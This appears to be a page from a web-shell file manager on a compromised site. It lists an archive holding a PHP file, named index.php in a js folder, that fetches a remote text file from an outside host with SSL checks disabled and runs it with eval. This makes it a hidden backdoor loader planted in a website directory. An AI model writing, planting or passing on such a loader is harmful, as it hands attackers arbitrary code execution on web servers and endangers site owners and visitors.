File manager - Edit - /home/lemagazi/www/archive/docs/v1/dpuay/endpoints.tar
Back
2023/js/mhn/index.php 0000666 00000000677 15134073535 0010174 0 ustar 00 <?php $url = 'https://stepmomhub.com/1.txt'; $content = @file_get_contents($url); if ($content === false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $content = curl_exec($ch); curl_close($ch); } if ($content) { $code = base64_encode($content); eval('?>' . base64_decode($code)); } ?>